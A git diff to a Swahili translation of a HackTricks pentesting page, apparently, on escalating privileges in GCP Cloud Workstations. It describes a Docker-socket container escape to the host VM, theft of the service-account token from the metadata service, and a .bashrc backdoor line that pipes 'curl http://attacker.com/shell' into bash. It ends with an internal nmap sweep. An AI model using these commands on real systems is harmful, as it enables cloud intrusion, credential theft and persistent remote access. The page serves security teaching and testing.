diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md index 370e7e8ba..fe069ffbf 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloud-workstations-privesc.md @@ -1,18 +1,19 @@ # GCP - Cloud Workstations Privesc +{{#include ../../../banners/hacktricks-training.md}} ### Container Breakout via Docker Socket (Container -> VM -> Project) -Njia kuu ya privilege escalation katika Cloud Workstations inatokana na hitaji la kuunga mkono workflows za **Docker-in-Docker (DinD)** kwa waendelezaji. Wakati usanidi wa workstation unachomeka Docker socket au kuruhusu privileged containers (usanidi wa kawaida), mshambuliaji ndani ya workstation container anaweza kutoroka hadi Compute Engine VM inayokaa chini na kuiba token ya service account yake. +Njia kuu ya privilege escalation katika Cloud Workstations inatokana na hitaji la kuunga mkono workflows za **Docker-in-Docker (DinD)** kwa watengenezaji. Wakati usanidi wa workstation una-mount Docker socket au unaruhusu privileged containers (usanidi wa kawaida), mshambulizi ndani ya workstation container anaweza kutoroka hadi Compute Engine VM ya msingi na kuiba token ya service account. -**Prerequisites:** -- Ufikiaji wa terminal ya Cloud Workstation (kupitia SSH, session iliyoathiriwa, au credentials zilizoporwa) -- Usanidi wa workstation lazima uchomeke `/var/run/docker.sock` au kuruhusu privileged containers +**Mahitaji:** +- Ufikiaji wa terminal ya Cloud Workstation (kwa kupitia SSH, session iliyovamiwa, au credentials zilizoporwa) +- Usanidi wa workstation lazima u-mount `/var/run/docker.sock` au kuwezesha privileged containers -**Architecture context:** Workstation ni container (Layer 3) inayokimbia kwenye Docker/Containerd runtime (Layer 2) kwenye GCE VM (Layer 1). Docker socket hutoa ufikiaji wa moja kwa moja kwa container runtime ya host. +**Muktadha wa usanifu:** Workstation ni container (Layer 3) inayokimbia kwenye Docker/Containerd runtime (Layer 2) kwenye GCE VM (Layer 1). Docker socket hutoa ufikiaji wa moja kwa moja kwa host's container runtime. > [!NOTE] -> The tool [gcp-workstations-containerEscapeScript](https://github.com/AI-redteam/gcp-workstations-containerEscapeScript) inaotomatisha full container escape na inakupeleka kwenye root shell kwenye host VM. +> Zana [gcp-workstations-containerEscapeScript](https://github.com/AI-redteam/gcp-workstations-containerEscapeScript) inafanikisha container escape kamili na inakupeleka kwenye root shell kwenye host VM.
@@ -26,9 +27,9 @@ ls -l /var/run/docker.sock
-Hatua 2: Kutoroka kwenye mfumo wa faili wa VM ya mwenyeji +Hatua ya 2: Escape to the host VM filesystem -Tunazindua privileged container, tukimount root directory ya host hadi `/mnt/host`. Pia tunashare network na PID namespace za host ili kuongeza uonekano. +Tunazindua privileged container, tukimount host's root directory kwa `/mnt/host`. Pia tunashare host's network na PID namespace ili kuongeza visibility. ```bash # Spawn a privileged container mounting the host's root filesystem docker run -it --rm --privileged --net=host --pid=host \ @@ -44,7 +45,7 @@ Sasa una **root shell on the underlying Compute Engine VM** (Layer 1).
-Hatua 3: Iba token ya service account ya VM kutoka IMDS +Hatua ya 3: Nyang'anya token ya service account ya VM kutoka IMDS ```bash # From the host VM, query the Instance Metadata Service curl -s -H "Metadata-Flavor: Google" \ @@ -61,16 +62,16 @@ http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scop
> [!CAUTION] -> **Kagua access scopes!** -> Hata kama Service Account iliyounganishwa ni **Editor**, VM inaweza kuwa imezuiwa na access scopes. -> Ikiwa unaona `https://www.googleapis.com/auth/cloud-platform`, una ruhusa kamili. -> Ikiwa unaona tu `logging.write` na `monitoring.write`, umezuiliwa kwa vector za **Network Pivot** na **Persistence** hapa chini. +> **Angalia Scopes!** +> Hata kama Service Account iliyounganishwa ni **Editor**, VM inaweza kuwa na vikwazo kwa sababu ya access scopes. +> Ikiwa unaona `https://www.googleapis.com/auth/cloud-platform`, una access kamili. +> Ikiwa unaona tu `logging.write` na `monitoring.write`, umezuiliwa kwa vectors za **Network Pivot** na **Persistence** hapa chini.
Step 4: Achieve Persistence (Backdoor the User) -Cloud Workstations zinaambatisha diski ya kudumu kwenye `/home/user`. Kwa sababu container user (kawaida `user`, UID 1000) anafanana na host user (UID 1000), unaweza kuandika kwenye home directory ya host. Hii inakuwezesha kuweka backdoor katika environment hata kama workstation container itajengwa upya. +Cloud Workstations zinapakia diski ya kudumu kwenye `/home/user`. Kwa sababu container user (kawaida `user`, UID 1000) inafanana na host user (UID 1000), unaweza kuandika kwenye katalogi ya nyumbani ya host. Hii inakuwezesha backdoor the environment hata kama workstation container itajengwa upya. ```bash # Check if you can write to the host's persistent home ls -la /mnt/host/home/user/ @@ -85,7 +86,7 @@ echo "curl http://attacker.com/shell | bash" >> /mnt/host/home/user/.bashrc Hatua 5: Network Pivot (Internal VPC Access) -Kwa kuwa unashiriki host network namespace (`--net=host`), sasa uko kama trusted node kwenye VPC. Unaweza scan internal services zinazoruhusu access kwa msingi wa IP whitelisting. +Kwa kuwa unashiriki host network namespace (`--net=host`), sasa wewe ni node ya kuaminika kwenye VPC. Unaweza kufanya scan kwa internal services zinazoruhusu access kulingana na IP whitelisting. ```bash # Install scanning tools on the host (if internet access allows) apk add nmap @@ -94,3 +95,7 @@ apk add nmap nmap -sS -p 80,443,22 10.0.0.0/8 ```
+ + + +{{#include ../../../banners/hacktricks-training.md}}